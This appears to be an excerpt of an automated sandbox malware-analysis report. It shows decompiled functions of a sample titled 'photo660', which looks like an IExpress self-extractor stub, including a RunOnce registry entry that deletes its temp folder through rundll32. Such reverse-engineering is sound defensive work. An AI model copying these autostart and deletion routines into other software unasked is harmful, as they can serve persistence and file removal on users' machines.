                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 2406144884-1757243477
                                                                                                                                                                                                        • Opcode ID: 49c6940822e7fabf4f6f3d5b0e7c054da1c29294c5b6523a819fddf7a3fbc449
                                                                                                                                                                                                        • Instruction ID: 8a0ff3adec95617880a87d126902c8af908d12abd783c9cfe4b1de12c7fc76b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49c6940822e7fabf4f6f3d5b0e7c054da1c29294c5b6523a819fddf7a3fbc449
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED318332340301BBDF209FA5AC4DE6B3AF5E79AB41F60461BF702952B0CE758902CA95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A94224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00A94224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00A944B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xa988c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xa987a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xa98598;
					_v36 = 1;
					_v32 = E00A94200;
					_v28 = 0xa988c0;
					 *0xa9a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xa9a288(_t32, 0xa988c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xa988c0 != 0) {
							E00A91680(0xa987a0, 0x104, 0xa988c0);
						}
						 *0xa9a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xa987a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xa988c0);
					_t61 = 0xa988c0;
					_t4 =  &(_t61[1]); // 0xa988c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xa988c0; // 0x1531181
					_t44 = CharPrevA(0xa988c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xa988c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                        0x00a94234
                                                                                                                                                                                                        0x00a9423c
                                                                                                                                                                                                        0x00a94240
                                                                                                                                                                                                        0x00a943b2
                                                                                                                                                                                                        0x00a943b7
                                                                                                                                                                                                        0x00a943c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a943c5
                                                                                                                                                                                                        0x00a9424c
                                                                                                                                                                                                        0x00a94252
                                                                                                                                                                                                        0x00a94257
                                                                                                                                                                                                        0x00a943a4
                                                                                                                                                                                                        0x00a943a5
                                                                                                                                                                                                        0x00a943ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a943ab
                                                                                                                                                                                                        0x00a94263
                                                                                                                                                                                                        0x00a94269
                                                                                                                                                                                                        0x00a9426e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9427a
                                                                                                                                                                                                        0x00a94280
                                                                                                                                                                                                        0x00a94285
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9428d
                                                                                                                                                                                                        0x00a94293
                                                                                                                                                                                                        0x00a942e6
                                                                                                                                                                                                        0x00a942e9
                                                                                                                                                                                                        0x00a942ef
                                                                                                                                                                                                        0x00a942f4
                                                                                                                                                                                                        0x00a942f7
                                                                                                                                                                                                        0x00a94300
                                                                                                                                                                                                        0x00a94307
                                                                                                                                                                                                        0x00a9430e
                                                                                                                                                                                                        0x00a94315
                                                                                                                                                                                                        0x00a9431c
                                                                                                                                                                                                        0x00a94322
                                                                                                                                                                                                        0x00a94326
                                                                                                                                                                                                        0x00a9432d
                                                                                                                                                                                                        0x00a9432d
                                                                                                                                                                                                        0x00a9432f
                                                                                                                                                                                                        0x00a94334
                                                                                                                                                                                                        0x00a94343
                                                                                                                                                                                                        0x00a94349
                                                                                                                                                                                                        0x00a9434d
                                                                                                                                                                                                        0x00a94354
                                                                                                                                                                                                        0x00a94354
                                                                                                                                                                                                        0x00a9435d
                                                                                                                                                                                                        0x00a9436e
                                                                                                                                                                                                        0x00a9436e
                                                                                                                                                                                                        0x00a9437d
                                                                                                                                                                                                        0x00a94383
                                                                                                                                                                                                        0x00a94387
                                                                                                                                                                                                        0x00a9438e
                                                                                                                                                                                                        0x00a9438e
                                                                                                                                                                                                        0x00a94387
                                                                                                                                                                                                        0x00a94391
                                                                                                                                                                                                        0x00a94399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a94295
                                                                                                                                                                                                        0x00a9429f
                                                                                                                                                                                                        0x00a942a5
                                                                                                                                                                                                        0x00a942aa
                                                                                                                                                                                                        0x00a942aa
                                                                                                                                                                                                        0x00a942ad
                                                                                                                                                                                                        0x00a942ad
                                                                                                                                                                                                        0x00a942af
                                                                                                                                                                                                        0x00a942b0
                                                                                                                                                                                                        0x00a942b6
                                                                                                                                                                                                        0x00a942c2
                                                                                                                                                                                                        0x00a942c8
                                                                                                                                                                                                        0x00a942ce
                                                                                                                                                                                                        0x00a942e4
                                                                                                                                                                                                        0x00a942e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a942ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A94236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A9424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A94263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A9427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00A988C0,?,00000001), ref: 00A9429F
                                                                                                                                                                                                        • CharPrevA.USER32(00A988C0,01531181,?,00000001), ref: 00A942C2
                                                                                                                                                                                                        • CharPrevA.USER32(00A988C0,00000000,?,00000001), ref: 00A942D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A94391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A943A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: c11f5c5cc6e33cf738071a5b855052f4a0eb9c9e01ede3ee57fdb8719d8053f5
                                                                                                                                                                                                        • Instruction ID: 03cca8148bfa5475ca4234ec23087fe852fffd6db836aff832bb2d9d5c9b65bd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c11f5c5cc6e33cf738071a5b855052f4a0eb9c9e01ede3ee57fdb8719d8053f5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A41C374B00204AFDF119BB4DC88AAE7BF4EB4A384F54456AE941AB251CF788C0387A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A92773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A92773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xa98004; // 0x6298f871
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00A91781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00A9658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00A9658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xa91140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00A91680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00A96CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                        0x00a92773
                                                                                                                                                                                                        0x00a9277e
                                                                                                                                                                                                        0x00a92785
                                                                                                                                                                                                        0x00a9278a
                                                                                                                                                                                                        0x00a9278d
                                                                                                                                                                                                        0x00a92790
                                                                                                                                                                                                        0x00a92792
                                                                                                                                                                                                        0x00a92798
                                                                                                                                                                                                        0x00a9279d
                                                                                                                                                                                                        0x00a928b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a927a3
                                                                                                                                                                                                        0x00a927a3
                                                                                                                                                                                                        0x00a927af
                                                                                                                                                                                                        0x00a927c2
                                                                                                                                                                                                        0x00a927c8
                                                                                                                                                                                                        0x00a927cd
                                                                                                                                                                                                        0x00a927d5
                                                                                                                                                                                                        0x00a928b7
                                                                                                                                                                                                        0x00a928b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a927db
                                                                                                                                                                                                        0x00a927dd
                                                                                                                                                                                                        0x00a928aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a927e3
                                                                                                                                                                                                        0x00a927e3
                                                                                                                                                                                                        0x00a927ec
                                                                                                                                                                                                        0x00a927f8
                                                                                                                                                                                                        0x00a92803
                                                                                                                                                                                                        0x00a9280b
                                                                                                                                                                                                        0x00a92831
                                                                                                                                                                                                        0x00a928c3
                                                                                                                                                                                                        0x00a928c9
                                                                                                                                                                                                        0x00a928cd
                                                                                                                                                                                                        0x00a92837
                                                                                                                                                                                                        0x00a9285a
                                                                                                                                                                                                        0x00a9285c
                                                                                                                                                                                                        0x00a92865
                                                                                                                                                                                                        0x00a92892
                                                                                                                                                                                                        0x00a92895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92867
                                                                                                                                                                                                        0x00a92878
                                                                                                                                                                                                        0x00a9288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9287a
                                                                                                                                                                                                        0x00a92880
                                                                                                                                                                                                        0x00a92885
                                                                                                                                                                                                        0x00a92897
                                                                                                                                                                                                        0x00a92899
                                                                                                                                                                                                        0x00a92899
                                                                                                                                                                                                        0x00a92878
                                                                                                                                                                                                        0x00a92865
                                                                                                                                                                                                        0x00a928a0
                                                                                                                                                                                                        0x00a928bf
                                                                                                                                                                                                        0x00a928c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a928c1
                                                                                                                                                                                                        0x00a92831
                                                                                                                                                                                                        0x00a927dd
                                                                                                                                                                                                        0x00a927d5
                                                                                                                                                                                                        0x00a928e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(6298F871,00000000,00000000,00000000), ref: 00A927A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00A927B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00A927BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A928AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A928B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A927E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                        • Instruction ID: 0d23a77eda34f2c0fe8087a8abffe9b9315949efda8f11b62a32a3f63311a099
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24416071B00128ABDF24DB649C85BFA77FDEF65700F1480AAF549D2110DB708E868FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A92267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00A92267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xa98004; // 0x6298f871
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xa98530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00A9658A( &_v268, 0x104, 0xa91140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E00A9171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00A96CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                        0x00a92272
                                                                                                                                                                                                        0x00a92277
                                                                                                                                                                                                        0x00a92279
                                                                                                                                                                                                        0x00a92283
                                                                                                                                                                                                        0x00a92289
                                                                                                                                                                                                        0x00a922ab
                                                                                                                                                                                                        0x00a922b1
                                                                                                                                                                                                        0x00a922c4
                                                                                                                                                                                                        0x00a922e0
                                                                                                                                                                                                        0x00a922e6
                                                                                                                                                                                                        0x00a922f5
                                                                                                                                                                                                        0x00a9230d
                                                                                                                                                                                                        0x00a9231c
                                                                                                                                                                                                        0x00a9231c
                                                                                                                                                                                                        0x00a92321
                                                                                                                                                                                                        0x00a9233a
                                                                                                                                                                                                        0x00a92342
                                                                                                                                                                                                        0x00a92348
                                                                                                                                                                                                        0x00a9234b
                                                                                                                                                                                                        0x00a9234c
                                                                                                                                                                                                        0x00a9234c
                                                                                                                                                                                                        0x00a9234e
                                                                                                                                                                                                        0x00a9234f
                                                                                                                                                                                                        0x00a9236e
                                                                                                                                                                                                        0x00a9236e
                                                                                                                                                                                                        0x00a9237a
                                                                                                                                                                                                        0x00a92380
                                                                                                                                                                                                        0x00a92380
                                                                                                                                                                                                        0x00a92381
                                                                                                                                                                                                        0x00a92381
                                                                                                                                                                                                        0x00a9238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A922A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00A922D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A922F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A92305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A9236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00A9237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • wextract_cleanup0, xrefs: 00A9227C, 00A922CD, 00A92363
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A9232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A92321
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A92299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 3027380567-2554356261
                                                                                                                                                                                                        • Opcode ID: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                        • Instruction ID: 7f2562d8f57296b15651d63e88d2ab7e6d1ea9574cf4e17745e8897ec9a426d1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65f4223cc5b7f02bf10057cc87268a68ed712faebb8fd78d63ed75c6a056e882
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1319371B00218BBDF21DB65DC49FEB77BCEB15700F0001AAB50DAA050EE746B89CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A93100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00A93100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xa98590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xa98590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00A943D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xa98d4c);
					SetWindowTextA(_t33, "photo660");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xa988b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00A930C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                        0x00a93108
                                                                                                                                                                                                        0x00a9310b
                                                                                                                                                                                                        0x00a931b7
                                                                                                                                                                                                        0x00a931ca
                                                                                                                                                                                                        0x00a931d0
                                                                                                                                                                                                        0x00a931d0
                                                                                                                                                                                                        0x00a931da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a931da
                                                                                                                                                                                                        0x00a93111
                                                                                                                                                                                                        0x00a93114
                                                                                                                                                                                                        0x00a93136
                                                                                                                                                                                                        0x00a93136
                                                                                                                                                                                                        0x00a93138
                                                                                                                                                                                                        0x00a9313b
                                                                                                                                                                                                        0x00a93141
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93143
                                                                                                                                                                                                        0x00a93116
                                                                                                                                                                                                        0x00a9311b
                                                                                                                                                                                                        0x00a9314b
                                                                                                                                                                                                        0x00a93151
                                                                                                                                                                                                        0x00a93158
                                                                                                                                                                                                        0x00a9316a
                                                                                                                                                                                                        0x00a93176
                                                                                                                                                                                                        0x00a9317d
                                                                                                                                                                                                        0x00a9318b
                                                                                                                                                                                                        0x00a9319e
                                                                                                                                                                                                        0x00a931a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a931ad
                                                                                                                                                                                                        0x00a93120
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9312a
                                                                                                                                                                                                        0x00a93134
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a93134
                                                                                                                                                                                                        0x00a9312c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00A9313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A9314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00A9316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00A93176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00A9317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00A93185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00A93190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00A930C0), ref: 00A931A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A931CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
